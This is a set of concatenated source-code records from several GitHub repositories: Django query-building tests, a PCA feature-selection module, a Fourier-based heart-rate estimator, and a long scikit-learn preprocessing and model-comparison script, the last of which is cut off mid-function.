Q(num__lt=0))\n self.assertEqual(where.connector, OR)\n\n lookup = where.children[0]\n self.assertIsInstance(lookup, GreaterThan)\n self.assertEqual(lookup.rhs, 2)\n self.assertEqual(lookup.lhs.target, Author._meta.get_field(\"num\"))\n\n lookup = where.children[1]\n self.assertIsInstance(lookup, LessThan)\n 
self.assertEqual(lookup.rhs, 0)\n self.assertEqual(lookup.lhs.target, Author._meta.get_field(\"num\"))\n\n def test_multiple_fields(self):\n query = Query(Item, alias_cols=False)\n where = query.build_where(Q(modified__gt=F(\"created\")))\n lookup = where.children[0]\n self.assertIsInstance(lookup, GreaterThan)\n self.assertIsInstance(lookup.rhs, Col)\n self.assertIsNone(lookup.rhs.alias)\n self.assertIsInstance(lookup.lhs, Col)\n self.assertIsNone(lookup.lhs.alias)\n self.assertEqual(lookup.rhs.target, Item._meta.get_field(\"created\"))\n self.assertEqual(lookup.lhs.target, Item._meta.get_field(\"modified\"))\n\n def test_transform(self):\n query = Query(Author, alias_cols=False)\n with register_lookup(CharField, Lower):\n where = query.build_where(~Q(name__lower=\"foo\"))\n lookup = where.children[0]\n self.assertIsInstance(lookup, Exact)\n self.assertIsInstance(lookup.lhs, Lower)\n self.assertIsInstance(lookup.lhs.lhs, Col)\n self.assertIsNone(lookup.lhs.lhs.alias)\n self.assertEqual(lookup.lhs.lhs.target, Author._meta.get_field(\"name\"))\n\n def test_negated_nullable(self):\n query = Query(Item)\n where = query.build_where(~Q(modified__lt=datetime(2017, 1, 1)))\n self.assertTrue(where.negated)\n lookup = where.children[0]\n self.assertIsInstance(lookup, LessThan)\n self.assertEqual(lookup.lhs.target, Item._meta.get_field(\"modified\"))\n lookup = where.children[1]\n self.assertIsInstance(lookup, IsNull)\n self.assertEqual(lookup.lhs.target, Item._meta.get_field(\"modified\"))\n\n def test_foreign_key(self):\n query = Query(Item)\n msg = \"Joined field references are not permitted in this query\"\n with self.assertRaisesMessage(FieldError, msg):\n query.build_where(Q(creator__num__gt=2))\n\n def test_foreign_key_f(self):\n query = Query(Ranking)\n with self.assertRaises(FieldError):\n query.build_where(Q(rank__gt=F(\"author__num\")))\n\n def test_foreign_key_exclusive(self):\n query = Query(ObjectC, alias_cols=False)\n where = query.build_where(Q(objecta=None) | Q(objectb=None))\n a_isnull = where.children[0]\n self.assertIsInstance(a_isnull, RelatedIsNull)\n self.assertIsInstance(a_isnull.lhs, Col)\n self.assertIsNone(a_isnull.lhs.alias)\n self.assertEqual(a_isnull.lhs.target, ObjectC._meta.get_field(\"objecta\"))\n b_isnull = where.children[1]\n self.assertIsInstance(b_isnull, RelatedIsNull)\n self.assertIsInstance(b_isnull.lhs, Col)\n self.assertIsNone(b_isnull.lhs.alias)\n self.assertEqual(b_isnull.lhs.target, ObjectC._meta.get_field(\"objectb\"))\n\n def test_clone_select_related(self):\n query = Query(Item)\n query.add_select_related([\"creator\"])\n clone = query.clone()\n clone.add_select_related([\"note\", \"creator__extra\"])\n self.assertEqual(query.select_related, {\"creator\": {}})\n\n def test_iterable_lookup_value(self):\n query = Query(Item)\n where = query.build_where(Q(name=[\"a\", \"b\"]))\n name_exact = where.children[0]\n self.assertIsInstance(name_exact, Exact)\n self.assertEqual(name_exact.rhs, \"['a', 'b']\")\n\n def test_filter_conditional(self):\n query = Query(Item)\n where = query.build_where(Func(output_field=BooleanField()))\n exact = where.children[0]\n self.assertIsInstance(exact, Exact)\n self.assertIsInstance(exact.lhs, Func)\n self.assertIs(exact.rhs, True)\n\n def test_filter_conditional_join(self):\n query = Query(Item)\n filter_expr = Func(\"note__note\", output_field=BooleanField())\n msg = \"Joined field references are not permitted in this query\"\n with self.assertRaisesMessage(FieldError, msg):\n query.build_where(filter_expr)\n\n def 
test_filter_non_conditional(self):\n query = Query(Item)\n msg = \"Cannot filter against a non-conditional expression.\"\n with self.assertRaisesMessage(TypeError, msg):\n query.build_where(Func(output_field=CharField()))\n\n\nclass TestQueryNoModel(TestCase):\n def test_rawsql_annotation(self):\n query = Query(None)\n sql = \"%s = 1\"\n # Wrap with a CASE WHEN expression if a database backend (e.g. Oracle)\n # doesn't support boolean expression in SELECT list.\n if not connection.features.supports_boolean_expr_in_select_clause:\n sql = f\"CASE WHEN {sql} THEN 1 ELSE 0 END\"\n query.add_annotation(RawSQL(sql, (1,), BooleanField()), \"_check\")\n result = query.get_compiler(using=DEFAULT_DB_ALIAS).execute_sql(SINGLE)\n self.assertEqual(result[0], 1)\n\n def test_subquery_annotation(self):\n query = Query(None)\n query.add_annotation(Exists(Item.objects.all()), \"_check\")\n result = query.get_compiler(using=DEFAULT_DB_ALIAS).execute_sql(SINGLE)\n self.assertEqual(result[0], 0)\n\n @skipUnlessDBFeature(\"supports_boolean_expr_in_select_clause\")\n def test_q_annotation(self):\n query = Query(None)\n check = ExpressionWrapper(\n Q(RawSQL(\"%s = 1\", (1,), BooleanField())) | Q(Exists(Item.objects.all())),\n BooleanField(),\n )\n query.add_annotation(check, \"_check\")\n result = query.get_compiler(using=DEFAULT_DB_ALIAS).execute_sql(SINGLE)\n self.assertEqual(result[0], 1)\n\n def test_names_to_path_field(self):\n query = Query(None)\n query.add_annotation(Value(True), \"value\")\n path, final_field, targets, names = query.names_to_path([\"value\"], opts=None)\n self.assertEqual(path, [])\n self.assertIsInstance(final_field, BooleanField)\n self.assertEqual(len(targets), 1)\n self.assertIsInstance(targets[0], BooleanField)\n self.assertEqual(names, [])\n\n def test_names_to_path_field_error(self):\n query = Query(None)\n msg = \"Cannot resolve keyword 'nonexistent' into field.\"\n with self.assertRaisesMessage(FieldError, msg):\n query.names_to_path([\"nonexistent\"], opts=None)\n\n def test_get_field_names_from_opts(self):\n self.assertEqual(get_field_names_from_opts(None), set())\n\n\nclass JoinPromoterTest(SimpleTestCase):\n def test_repr(self):\n self.assertEqual(\n repr(JoinPromoter(AND, 3, True)),\n \"JoinPromoter(connector='AND', num_children=3, negated=True)\",\n )\n","repo_name":"django/django","sub_path":"tests/queries/test_query.py","file_name":"test_query.py","file_ext":"py","file_size_in_byte":9069,"program_lang":"python","lang":"en","doc_type":"code","stars":74132,"dataset":"github-code","pt":"37"} +{"seq_id":"13732684853","text":"from sklearn.decomposition import PCA\nfrom sklearn.cluster import KMeans\nfrom collections import defaultdict\nfrom sklearn.metrics.pairwise import euclidean_distances\nfrom sklearn.preprocessing import StandardScaler\nimport math\n\nclass PFA(object):\n def __init__(self, n_features, q=None):\n self.q = q\n self.n_features = n_features\n\n def fit(self, X):\n if not self.q:\n self.q = X.shape[1]\n\n sc = StandardScaler()\n X = sc.fit_transform(X)\n\n pca = PCA(n_components=self.q).fit(X)\n A_q = pca.components_.T\n\n kmeans = KMeans(n_clusters=self.n_features).fit(A_q)\n clusters = kmeans.predict(A_q)\n cluster_centers = kmeans.cluster_centers_\n\n dists = defaultdict(list)\n for i, c in enumerate(clusters):\n dist = euclidean_distances([A_q[i, :]], [cluster_centers[c, :]])[0][0]\n dists[c].append((i, dist))\n\n self.indices_ = [sorted(f, key=lambda x: x[1])[0][0] for f in dists.values()]\n self.features_ = X[:, self.indices_]\n\nclass 
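# --- Editor's sketch (hypothetical usage, assuming the PFA class above is in scope) ---
# PFA picks, for each KMeans cluster of PCA loading vectors, the feature
# closest to the cluster centre, so after fit() indices_ names the selected
# columns and features_ holds the reduced matrix. A minimal smoke test:
import numpy as np

rng = np.random.RandomState(0)
X = rng.rand(50, 8)            # 50 samples, 8 candidate features
pfa = PFA(n_features=3)        # keep the 3 most representative features
pfa.fit(X)
assert len(pfa.indices_) == 3
assert pfa.features_.shape == (50, 3)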
PCAFeatures(object):\n def __init__(self, n_features, q=None):\n self.q = q\n self.n_features = n_features\n self.feature_scores = []\n\n def fit(self, X):\n if not self.q:\n self.q = X.shape[1]\n\n sc = StandardScaler()\n X = sc.fit_transform(X)\n\n pca = PCA(n_components=self.q)\n X_reduced = pca.fit(X)\n components = X_reduced.components_.T\n self.feature_scores = [0] * len(X_reduced.explained_variance_ratio_)\n for i in range(0, len(X_reduced.explained_variance_ratio_)):\n pc_variance = X_reduced.explained_variance_ratio_[i]\n component_columns = components[i]\n for j in range(0, len(component_columns)):\n pc_feature_score = math.fabs(pc_variance * component_columns[j])\n self.feature_scores[j] += pc_feature_score\n\n #\n # pca.fit(X)\n # X_proj = pca.transform(X)\n # components = pca.components_\n # X_rec = pca.inverse_transform(X_proj)\n # print()\n\n\n\n # self.indices_ = [sorted(f, key=lambda x: x[1])[0][0] for f in dists.values()]\n # self.features_ = X[:, self.indices_]","repo_name":"MWSanders/AssociationAbacMiner","sub_path":"src/experiment/PFA.py","file_name":"PFA.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"17101907317","text":"from scipy.signal import periodogram\nimport numpy as np\n\n# Фурье-анализ\ndef fourier_analysis(ppg_signal, fps):\n \n def find_idx_bigger(arr, thr):\n return next(f[0] for f in enumerate(arr) if f[1] > thr)\n \n MinFreq = 45 # bpm\n MaxFreq = 100 # bpm\n freqs, psd = periodogram(ppg_signal, fs=fps, window=None, detrend='constant', return_onesided=True, scaling='density')\n min_idx = find_idx_bigger(freqs, MinFreq/60.0) - 1\n max_idx = find_idx_bigger(freqs, MaxFreq/60.0) + 1\n hr_estimated = freqs[ min_idx + np.argmax(psd[min_idx : max_idx]) ]\n \n return hr_estimated","repo_name":"ArtemAvanesov/RPPG-BPM","sub_path":"second_stage/fourier_analysis.py","file_name":"fourier_analysis.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"37"} +{"seq_id":"22502439932","text":"import plotly.express as px\nimport numpy as np\nimport pandas as pd\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom sklearn import datasets\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import cross_val_score\nfrom numpy import mean\nfrom sklearn.compose import ColumnTransformer\nimport plotly\nfrom sklearn.base import clone\nimport itertools\nimport re \n# Encoder\nfrom sklearn.preprocessing import OneHotEncoder\n# Imputers\nfrom sklearn.impute import KNNImputer\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.experimental import enable_iterative_imputer\nfrom sklearn.impute import IterativeImputer\n# Outliers\nfrom sklearn.neighbors import LocalOutlierFactor\nfrom sklearn.ensemble import IsolationForest\n# Feature selectors\nfrom sklearn.feature_selection import SelectKBest\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis \nfrom sklearn.decomposition import PCA\nfrom sklearn.feature_selection import mutual_info_regression\nfrom sklearn.preprocessing import FunctionTransformer\nfrom sklearn.feature_selection import mutual_info_classif\nfrom sklearn.feature_selection import f_classif\nfrom sklearn.feature_selection import chi2\nfrom sklearn.feature_selection import f_regression\nfrom sklearn.feature_selection import 
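# --- Editor's sketch (hypothetical usage, assuming fourier_analysis above is in scope) ---
# fourier_analysis estimates heart rate as the periodogram peak inside a
# 45-100 bpm band and returns that peak frequency in Hz. A synthetic PPG at
# exactly 72 bpm (1.2 Hz) should recover it:
import numpy as np

fps = 30.0                                   # assumed camera frame rate
t = np.arange(0, 20, 1 / fps)                # 20 s of samples
ppg = np.sin(2 * np.pi * 1.2 * t)            # 1.2 Hz -> 72 bpm
hr = fourier_analysis(ppg, fps)              # peak frequency, Hz
assert abs(hr * 60 - 72) < 2                 # within ~2 bpm of the true rate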
r_regression\n# Scalers\nfrom sklearn.preprocessing import RobustScaler, MinMaxScaler, MaxAbsScaler\nfrom sklearn.preprocessing import StandardScaler\n# Estimators\nfrom sklearn.linear_model import LinearRegression, Ridge, TweedieRegressor, QuantileRegressor\nfrom sklearn.linear_model import Lasso, ElasticNet, BayesianRidge, ARDRegression\nfrom sklearn.linear_model import OrthogonalMatchingPursuit\nfrom sklearn.neighbors import KNeighborsRegressor\nfrom xgboost import XGBRegressor\nfrom sklearn.gaussian_process import GaussianProcessRegressor\nfrom sklearn.cross_decomposition import PLSRegression\nfrom sklearn.neural_network import MLPRegressor\n# Distribution\nfrom sklearn.preprocessing import QuantileTransformer\nfrom sklearn.preprocessing import PowerTransformer\nfrom sklearn.compose import ColumnTransformer, make_column_selector\n\n\"\"\" <-------------------------------- SET ---------------------------------> \"\"\"\n\ndf = pd.read_csv('train.csv')\ndf.drop(columns=['Id'],inplace=True)\nX_raw = df.drop(columns=['target']).copy()\ny_raw = df['target'].copy()\nnumerical_data = list(X_raw.columns)\ncategorical_data = []\nencoding_data = []\n\n# Split, es necesario cambiar el nombre de la columna objetivo a 'target'\n\nX_train, X_rem, y_train, y_rem = train_test_split(X_raw,y_raw, train_size=0.6,random_state=42)\nX_cv, X_test, y_cv, y_test = train_test_split(X_rem,y_rem, train_size=0.5,random_state=42)\n\nX = np.concatenate([X_train,X_cv])\nX = pd.DataFrame(X,columns=X_raw.columns)\ny = np.concatenate([y_train,y_cv])\ny = pd.DataFrame(y,columns=['target'])\n\n\"\"\" <----------------------------- FUNCTIONS ------------------------------> \"\"\"\n\ndef delete_nan(X,y,data):\n df_ = pd.concat([X,y],axis=1)\n df_ = df_.dropna(subset=data).reset_index(drop=True).copy() \n X, y = df_.drop(columns=['target']), pd.DataFrame(df_['target']) \n return X, y\n\ndef outlier_models(X,y,estimator,numerical_data):\n df = pd.concat([X,y],axis=1)\n\n if estimator == 'lof':\n lof = LocalOutlierFactor()\n X_bool_outliers = lof.fit_predict(df[numerical_data])\n\n elif estimator == 'ifo':\n ifo = IsolationForest()\n X_bool_outliers = ifo.fit_predict(df[numerical_data])\n\n mask = X_bool_outliers != -1\n X, y = df.drop(columns=['target']).iloc[mask,:], pd.DataFrame(df['target'][mask]) \n return X,y\n\ndef parameter_iterator(transformer,params):\n combination = []\n for t,k in enumerate(transformer):\n keys, values = zip(*params[t].items())\n permutations_dicts = [dict(zip(keys, v)) for v in itertools.product(*values)]\n for i in permutations_dicts:\n try:\n combination.append(clone(k.set_params(**i)))\n except:\n combination.append(k)\n \n return combination\n\ndef name_columns(transformer_names,transformer):\n columns_name = []\n for i in transformer.get_feature_names_out():\n for k in transformer_names:\n if k in i:\n name = i.replace(k,'')\n columns_name.append(name)\n return columns_name\n\ndef best_transformer(name,best_pipeline):\n for n,i in zip(best_pipeline[name].keys(),best_pipeline[name].values()):\n try:\n if i > j:\n best = n\n except:\n j=i\n best = n\n return best\n\ndef alpha_preprocessing(X,y,name_numerical_imputer,numerical_imputer,\n name_categorical_imputer,categorical_imputer,\n name_encoder, encoder,\n name_scaler,scaler,scaler_params,\n name_estimator,estimator,estimator_params,\n numerical_data,categorical_data,encoding_data,n_iterations,df=False):\n\n \"\"\" MISSING DATA AND ENCODIG\n Este algoritmo realiza la combinación de 2 imputadores (uno númerico y otro categorico),\n un 
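# --- Editor's sketch (hypothetical usage, assuming delete_nan above is in scope) ---
# delete_nan drops rows with missing values in the given columns and is used
# whenever an imputer slot is set to 'passthrough' (i.e. no imputation at all).
# On a toy frame, only the row with a complete 'a' survives:
import numpy as np
import pandas as pd

X_demo = pd.DataFrame({"a": [1.0, np.nan], "b": [3.0, 4.0]})
y_demo = pd.DataFrame({"target": [0, 1]})
X_out, y_out = delete_nan(X_demo, y_demo, ["a"])
assert len(X_out) == 1 and list(X_out.columns) == ["a", "b"]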
codificador y \"n\" número de estimadores para determinar que combinación de los imputadores y\n el codificador da un mejor score para un estimador u otro. \n [ A / B of iteration C/D ] = A es la combinación en la cual va el algoritmo,\n B es el número de combinaciones totales,\n C es la iteración en la cual va\n D es el número de iteraciones totales\n Si el target posee valores perdidos agregarlo a la categoria correspondiente ya sea numerico o categoric,\n es decir categorical_data = ['target'] + categorical_data\n \"\"\"\n\n iteration = 1\n number_of_iterations = len(name_numerical_imputer)*len(name_categorical_imputer)*len(name_encoder)*len(name_estimator)*len(name_scaler)\n # len(name_outlier)*len(name_num_cat_feature)*len(name_numerical_feature)*\\\n # len(name_categorical_feature )*len(name_distribution)*len(name_scaler)*len(name_estimator)\n \n numerical_imputer_conter = []\n categorical_imputer_conter = []\n categorical_encoder_conter = []\n estimator_conter = []\n scaler_conter = []\n categorical_data_copy = categorical_data.copy()\n\n columns = ['Numerical_Imputer','Categorical_Imputer','Encoding','Scaler','Estimator','Score','Iteration']\n results = pd.DataFrame(columns=columns)\n while iteration <= n_iterations:\n \n conter=1\n score_ = []\n data = []\n for name_numerical_imputer_, numerical_imputer_ in \\\n zip(name_numerical_imputer,numerical_imputer):\n\n for name_categorical_imputer_, categorical_imputer_ in \\\n zip(name_categorical_imputer,categorical_imputer):\n\n for name_encoder_, encoder_ in zip(name_encoder, encoder): \n\n for name_scaler_, scaler_, scaler_params_ in zip(name_scaler,scaler,scaler_params):\n\n for name_estimator_, estimator_,estimator_params_ in zip(name_estimator,estimator,estimator_params): \n\n if name_numerical_imputer_ == 'passthrough' and name_categorical_imputer_ == 'passthrough':\n X_,y_ = delete_nan(X,y,categorical_data+numerical_data)\n\n elif name_numerical_imputer_ == 'passthrough':\n X_,y_ = delete_nan(X,y,numerical_data)\n \n elif name_categorical_imputer_ == 'passthrough':\n X_,y_ = delete_nan(X,y,categorical_data)\n\n else:\n X_,y_ = X,y\n \n # Preprocessor Imputer\n\n numerical_preprocessing = Pipeline([\n ('numerical_imputer', numerical_imputer_),\n ])\n\n categorical_preprocessing = Pipeline([\n ('categorical_imputer', categorical_imputer_),\n ])\n\n preprocessor = ColumnTransformer([\n ('numerical',numerical_preprocessing,numerical_data),\n ('categorical', categorical_preprocessing,categorical_data),\n ],verbose_feature_names_out=True,remainder='passthrough')\n\n X_ = preprocessor.fit_transform(X_)\n transformer = ['numerical__','categorical__','remainder__']\n columns_name = []\n for i in preprocessor.get_feature_names_out():\n for k in transformer:\n if k in i:\n name = i.replace(k,'')\n columns_name.append(name)\n\n X_ = pd.DataFrame(X_,columns=columns_name)\n\n # Encoder\n encoding_preprocessing = Pipeline([\n ('encoding', encoder_)\n ])\n\n preprocessor_encoder = ColumnTransformer([\n ('encoder',encoding_preprocessing,encoding_data)\n ],verbose_feature_names_out=True,remainder='passthrough')\n \n X_ = preprocessor_encoder.fit_transform(X_)\n\n transformer = ['encoder__','remainder__']\n columns_name = []\n for i in preprocessor_encoder.get_feature_names_out():\n for k in transformer:\n if k in i:\n name = i.replace(k,'')\n columns_name.append(name)\n\n X_ = pd.DataFrame(X_,columns=columns_name)\n\n categorical_data = [x for x in X_.columns if x not in numerical_data]\n params = {**estimator_params_,**scaler_params_}\n 
regression_pipe = Pipeline([\n ('scaler',scaler_),\n ('estimator',estimator_)\n ])\n\n regression_grid = GridSearchCV(regression_pipe,param_grid=params,scoring='r2',cv=5,n_jobs=1)\n regression_grid.fit(X_,y_.values.ravel())\n best_params = regression_grid.best_params_\n score_.append(regression_grid.best_score_)\n information = \"Numerical_Imputer: {0}; \"\\\n \"Catergorical_Imputer: {1}; \"\\\n \"Encoding: {2}; \"\\\n \"Scaler: {3}; \"\\\n \"Estimator: {4}; \"\\\n \"Score: {5}\".format(name_numerical_imputer_,\n name_categorical_imputer_,\n name_encoder_,\n name_scaler_,\n name_estimator_,\n regression_grid.best_score_)\n data.append(information)\n #print(information + \" [{0} / {1} of iteration {2}/{3}]\".format(conter,number_of_iterations,iteration,n_iterations)+'\\n')\n if df == False:\n results.loc[len(results)] = [name_numerical_imputer_,\n name_categorical_imputer_,\n name_encoder_,\n name_scaler_,\n name_estimator_,\n regression_grid.best_score_,\n \" [{0} / {1} of iteration {2}/{3}]\".format(conter,number_of_iterations,iteration,n_iterations)]\n results.to_csv('results_preprocess_1.csv',index=False)\n\n categorical_data = categorical_data_copy \n conter+=1\n idx = (-(np.array(score_))).argsort()[:5] # Select high score index\n for i in idx:\n numerical_imputer_conter.append(data[i].split('; ')[-6].split(': ')[1]) # Estimator conter\n categorical_imputer_conter.append(data[i].split('; ')[-5].split(': ')[1])\n categorical_encoder_conter.append(data[i].split('; ')[-4].split(': ')[1])\n scaler_conter.append(data[i].split('; ')[-3].split(': ')[1])\n estimator_conter.append(data[i].split('; ')[-2].split(': ')[1])\n iteration +=1\n\n best_pipeline = {}\n final_results = {}\n if df == False:\n with open('best_estimators_1.txt','w') as f:\n f.write('\\nNUMERICAL_IMPUTER\\n')\n for i in list(set(numerical_imputer_conter)):\n final_results[i]=numerical_imputer_conter.count(i)\n f.write(i+': '+str(final_results[i])+'\\n')\n try:\n best_pipeline['NUMERICAL_IMPUTER']={**{i:final_results[i]},**best_pipeline['NUMERICAL_IMPUTER']}\n except:\n best_pipeline['NUMERICAL_IMPUTER']={i:final_results[i]}\n f.write('\\nCATEGORICAL_IMPUTER\\n')\n for i in list(set(categorical_imputer_conter)):\n final_results[i]=categorical_imputer_conter.count(i)\n f.write(i+': '+str(final_results[i])+'\\n')\n try:\n best_pipeline['CATEGORICAL_IMPUTER']={**{i:final_results[i]},**best_pipeline['CATEGORICAL_IMPUTER']}\n except:\n best_pipeline['CATEGORICAL_IMPUTER']={i:final_results[i]}\n f.write('\\nCATEGORICAL_ENCODER\\n')\n for i in list(set(categorical_encoder_conter)):\n final_results[i]=categorical_encoder_conter.count(i)\n f.write(i+': '+str(final_results[i])+'\\n')\n try:\n best_pipeline['CATEGORICAL_ENCODER']={**{i:final_results[i]},**best_pipeline['CATEGORICAL_ENCODER']}\n except:\n best_pipeline['CATEGORICAL_ENCODER']={i:final_results[i]}\n f.write('\\nSCALER\\n')\n for i in list(set(scaler_conter)):\n final_results[i]=scaler_conter.count(i)\n f.write(i+': '+str(final_results[i])+'\\n')\n try:\n best_pipeline['SCALER']={**{i:final_results[i]},**best_pipeline['SCALER']}\n except:\n best_pipeline['SCALER']={i:final_results[i]}\n f.write('\\nESTIMATOR\\n')\n for i in list(set(estimator_conter)):\n final_results[i]=estimator_conter.count(i)\n f.write(i+': '+str(final_results[i])+'\\n')\n try:\n best_pipeline['ESTIMATOR']={**{i:final_results[i]},**best_pipeline['ESTIMATOR']}\n except:\n best_pipeline['ESTIMATOR']={i:final_results[i]} \n else:\n with open('parameter_for_preprocess_2.txt','w') as f:\n 
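# --- Editor's sketch (hypothetical, not part of the record above) ---
# Every candidate combination above is scored the same way: wrap the step(s)
# in a Pipeline, grid-search its parameters with 5-fold CV on r2, and keep
# best_score_. The scoring core, minus the surrounding bookkeeping:
import numpy as np
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import GridSearchCV
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler

rng = np.random.RandomState(0)
X_demo = rng.rand(40, 3)
y_demo = X_demo @ np.array([1.0, -2.0, 0.5]) + 0.01 * rng.randn(40)

pipe = Pipeline([("scaler", StandardScaler()), ("estimator", LinearRegression())])
grid = GridSearchCV(pipe, param_grid={}, scoring="r2", cv=5)
grid.fit(X_demo, y_demo)
assert grid.best_score_ > 0.9   # nearly-linear data, so r2 should be high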
f.write('\\nNUMERICAL_IMPUTER\\n')\n for i in list(set(numerical_imputer_conter)):\n f.write((i)+'\\n')\n f.write('\\nCATEGORICAL_IMPUTER\\n')\n for i in list(set(categorical_imputer_conter)):\n f.write((i)+'\\n')\n f.write('\\nCATEGORICAL_ENCODER\\n')\n for i in list(set(categorical_encoder_conter)):\n f.write((i)+'\\n')\n\n if df == True:\n return X_,y\n return best_pipeline\n\ndef beta_preprocessing(X,y,name_outlier,outlier,\n name_num_cat_feature,num_cat_feature,\n name_numerical_feature,numerical_feature,\n name_categorical_feature,categorical_feature,\n name_distribution,distribution,\n name_scaler,scaler,\n name_estimator,estimator,estimator_params,\n numerical_data,categorical_data,n_iterations,return_best=False):\n\n \"\"\" MISSING DATA AND ENCODIG\n Este algoritmo realiza la combinación de 2 imputadores (uno númerico y otro categorico),\n un codificador y \"n\" número de estimadores para determinar que combinación de los imputadores y\n el codificador da un mejor score para un estimador u otro. \n [ A / B of iteration C/D ] = A es la combinación en la cual va el algoritmo,\n B es el número de combinaciones totales,\n C es la iteración en la cual va\n D es el número de iteraciones totales\n \"\"\"\n\n iteration = 1\n number_of_iterations = len(name_outlier)*len(name_num_cat_feature)*\\\n len(name_numerical_feature)*len(name_estimator)*len(name_scaler)*\\\n len(name_categorical_feature )*len(name_distribution)\n # len(name_outlier)*len(name_num_cat_feature)*len(name_numerical_feature)*\\\n # len(name_categorical_feature )*len(name_distribution)*len(name_scaler)*len(name_estimator)\n \n # For the file text \n distribution_conter = []\n outlier_conter = []\n num_cat_feature_conter = [] \n numerical_feature_conter = []\n categorical_feature_conter = []\n scaler_conter = []\n estimator_conter = []\n # Fin\n categorical_data_copy = categorical_data.copy()\n numerical_data_copy = numerical_data.copy()\n columns = ['Distribution','Outlier','Num_Cat_Feature','Numerical_Feature','Categorical_Feature','Scaler','estimator','Score','Iteration']\n results = pd.DataFrame(columns=columns)\n while iteration <= n_iterations:\n \n conter=1\n score_ = []\n data = []\n for name_outlier_,outlier_ in zip(name_outlier,outlier):\n\n for name_num_cat_feature_,num_cat_feature_ in zip(name_num_cat_feature,num_cat_feature):\n\n for name_numerical_feature_,numerical_feature_ in zip( name_numerical_feature,numerical_feature): \n\n for name_categorical_feature_,categorical_feature_ in zip(name_categorical_feature,categorical_feature):\n\n for name_distribution_,distribution_ in zip(name_distribution,distribution): \n\n for name_scaler_, scaler_ in zip(name_scaler,scaler):\n\n for name_estimator_, estimator_,estimator_params_ in \\\n zip(name_estimator,estimator,estimator_params): \n\n X_,y_ = X,y\n \n # Predict outliers\n\n if name_outlier_ != 'None':\n df = pd.concat([X_,y_],axis=1)\n X_bool_outliers = outlier_.fit_predict(df[numerical_data])\n mask = X_bool_outliers != -1\n X_, y_ = df.drop(columns=['target']).iloc[mask,:], pd.DataFrame(df['target'][mask])\n \n #print('Outlier',X_.shape)\n\n # Feature selection\n try:\n\n num_cat = ColumnTransformer([('num_cat_feature',num_cat_feature_,numerical_data+categorical_data)],remainder='passthrough',verbose_feature_names_out=True)\n\n X_ = num_cat.fit_transform(X_,y_)\n\n columns_name = name_columns(['num_cat_feature__','remainder__'],num_cat)\n X_ = pd.DataFrame(X_,columns=columns_name)\n\n categorical_data = [x for x in X_.columns if x not in numerical_data]\n 
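# --- Editor's sketch (hypothetical, not part of the record above) ---
# With verbose_feature_names_out=True, ColumnTransformer prefixes every output
# column with its transformer name ('numerical__age', 'remainder__city', ...).
# name_columns above strips those prefixes back off so the original column
# names keep flowing through each stage. The stripping step in isolation,
# using startswith rather than substring replacement:
def strip_prefixes(names, prefixes):
    out = []
    for name in names:
        for p in prefixes:
            if name.startswith(p):
                out.append(name[len(p):])
                break
    return out

raw = ["numerical__age", "remainder__city"]
assert strip_prefixes(raw, ["numerical__", "remainder__"]) == ["age", "city"]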
numerical_data = [x for x in X_.columns if x not in categorical_data]\n #print('MUTUAL: ',X_.shape)\n\n num = ColumnTransformer([('numerical_feature', numerical_feature_,numerical_data)],verbose_feature_names_out=True,remainder='passthrough')\n X_ = num.fit_transform(X_,y_.values.ravel())\n\n columns_name = name_columns(['numerical_feature__','remainder__'],num)\n X_ = pd.DataFrame(X_,columns=columns_name)\n \n categorical_data = [x for x in X_.columns if x not in numerical_data]\n numerical_data = [x for x in X_.columns if x not in categorical_data]\n\n #print('PEARSON: ',X_.shape)\n cat = ColumnTransformer([('categorical_feature', categorical_feature_,categorical_data)],verbose_feature_names_out=True,remainder='passthrough')\n X_ = cat.fit_transform(X_,y_)\n\n columns_name = name_columns(['categorical_feature__','remainder__'],cat)\n X_ = pd.DataFrame(X_,columns=columns_name)\n\n categorical_data = [x for x in X_.columns if x not in numerical_data]\n numerical_data = [x for x in X_.columns if x not in categorical_data]\n\n #print('CHI2: ',X_.shape)\n \n except:\n conter+=1\n categorical_data = categorical_data_copy \n numerical_data = numerical_data_copy\n break\n\n dist = ColumnTransformer([('distribution', distribution_,numerical_data)],verbose_feature_names_out=True,remainder='passthrough')\n X_ = dist.fit_transform(X_,y_)\n\n columns_name = name_columns(['distribution__','remainder__'],dist)\n X_ = pd.DataFrame(X_,columns=columns_name)\n\n categorical_data = [x for x in X_.columns if x not in numerical_data]\n numerical_data = [x for x in X_.columns if x not in categorical_data]\n\n #print('DISTRIBUTION: ',X_.shape)\n\n sca = ColumnTransformer([('scaler',scaler_,numerical_data)],verbose_feature_names_out=True,remainder='passthrough')\n X_ = sca.fit_transform(X_)\n\n\n columns_name = name_columns(['scaler__','remainder__'],sca)\n X_ = pd.DataFrame(X_,columns=columns_name)\n\n categorical_data = [x for x in X_.columns if x not in numerical_data]\n numerical_data = [x for x in X_.columns if x not in categorical_data]\n #print('SCALER: ',X_.shape)\n\n regression_pipe = Pipeline([\n ('estimator',estimator_)\n ])\n \n regression_grid = GridSearchCV(regression_pipe,param_grid=estimator_params_,scoring='r2',cv=5,n_jobs=3)\n regression_grid.fit(X_,y_.values.ravel())\n best_params = regression_grid.best_params_\n score_.append(regression_grid.best_score_)\n information = \"Distribution: {0}; \"\\\n \"Outlier: {1}; \"\\\n \"Num_cat_feature: {2}; \"\\\n \"Numerical_feature: {3}; \"\\\n \"Categorical_feature: {4}; \"\\\n \"Scaler: {5}; \"\\\n \"Estimator: {6}; \"\\\n \"Score: {7}\".format(name_distribution_,\n name_outlier_,\n name_num_cat_feature_,\n name_numerical_feature_,\n name_categorical_feature_,\n name_scaler_,\n name_estimator_,\n regression_grid.best_score_)\n data.append(information)\n #print(information + \" [{0} / {1} of iteration {2}/{3}]\".format(conter,number_of_iterations,iteration,n_iterations)+'\\n')\n results.loc[len(results)] = [name_distribution_,\n name_outlier_,\n name_num_cat_feature_,\n name_numerical_feature_,\n name_categorical_feature_,\n name_scaler_,\n name_estimator_,\n regression_grid.best_score_,\n \" [{0} / {1} of iteration 